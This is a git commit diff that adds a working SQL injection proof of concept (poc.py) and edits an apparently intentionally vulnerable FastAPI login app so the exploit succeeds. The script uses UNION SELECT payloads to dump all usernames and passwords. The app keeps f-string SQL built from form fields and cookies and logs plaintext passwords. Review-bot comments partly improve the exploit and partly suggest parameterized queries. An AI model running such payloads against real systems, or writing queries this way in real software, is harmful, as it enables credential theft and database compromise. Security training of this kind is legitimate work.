d448005293 working poc added
MY BRAIN IS MELTIIINNG
2025-12-16 02:26:01 +10:00
a7ee7331f8 exploit is now possible 2025-12-16 02:15:51 +10:00
2 changed files with 31 additions and 3 deletions

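--- /dev/null
+++ b/poc.py
@@ -0,0 +1,26 @@
+import requests
+import re
+BASE_URL = "http://localhost:8000"
+login_payload = "' UNION SELECT login FROM users--"
+form_data = {"login": login_payload, "password": "' OR 1=1--"}
+response_logins = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
+password_payload = "' UNION SELECT password FROM users--"
+form_data = {"login": password_payload, "password": "' OR 1=1--"}
+response_passwords = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
+logins_raw = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_logins.text).group(1)
+passwords_raw = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_passwords.text).group(1)
+logins= logins_raw.split("',), ('")
+passwords = passwords_raw.split("',), ('")
+if logins and passwords:
+    for i, (login, password) in enumerate(zip(logins, passwords)):
+        print(f" {i+1}. Логин: {login:<20} Пароль: {password}")
+else:
+    print("Не удалось извлечь данные.")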
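Review bot: `re.search(...).group(1)` on the `logins_raw` and `passwords_raw` lines raises AttributeError whenever the `<h1>Привет, …</h1>` marker is missing from the response (a rejected login lands on a page without it), so the `else: print("Не удалось извлечь данные.")` branch can never run. Check the match before dereferencing it, e.g. `m = re.search(pattern, response_logins.text)` then `logins_raw = m.group(1) if m else ""`, and hoist the regex into one compiled module constant since it is used twice. Pairing the two dumps with `zip(logins, passwords)` also assumes both UNION queries return rows in the same order; neither has an ORDER BY, so the pairing is only as reliable as the backend's default row order, and pulling both columns in a single query (concatenated with a separator, in whatever syntax the database supports) would remove that assumption.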

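@@ -95,7 +95,7 @@ async def login_form():
 @app.post("/login")
 async def login(login: str = Form(...), password: str = Form(...)):
     cursor.execute(
-        f"SELECT * FROM users WHERE login='{login}' AND password='{password}'"
+        f"SELECT login FROM users WHERE login='{login}' AND password='{password}'"
     )
     user = cursor.fetchall()
     if user:
@@ -124,8 +124,10 @@ async def welcome(request: Request):
     password = request.cookies.get("password")
     if not login or not password:
         return RedirectResponse(url="/login")
+    query=f"SELECT login FROM users WHERE login='{login}' AND password='{password}'"
+    print(f"executing: {query}")
     cursor.execute(
-        f"SELECT login FROM users WHERE login='{login}' AND password='{password}'"
+        query
     )
     user = cursor.fetchall()
     if user:
@@ -133,7 +135,7 @@ async def welcome(request: Request):
     <html>
     <head><title>Добро пожаловать</title>{STYLES}</head>
     <body>
-    <h1>Привет, {user}</h1>
+    <h1>Привет, {str(user)[3:-4]}</h1>
     <button onclick="
     document.cookie = 'login=; expires=Thu, 01 Jan 1970 00:00:00 UTC; path=/;';
     document.cookie = 'password=; expires=Thu, 01 Jan 1970 00:00:00 UTC; path=/;';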
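Review bot: The added `print(f"executing: {query}")` in the `welcome` hunk writes the fully interpolated statement, including the plaintext `password` cookie value, to stdout on every page load, so the process log becomes both a credential store and a record of every injected payload. The statement is still built with an f-string from the `login` and `password` cookies, which is exactly what `poc.py` relies on; if that is the intent of this training target, mark it at the point of use with something like `# INTENTIONALLY VULNERABLE: cookie values are interpolated into SQL (see poc.py)` and drop or redact the print, otherwise bind the values with the driver's placeholder syntax, e.g. `cursor.execute("SELECT login FROM users WHERE login=? AND password=?", (login, password))`. Either way `query=` should get spaces around the `=` to match the rest of the file. `login` and `welcome` both start and end outside these hunks.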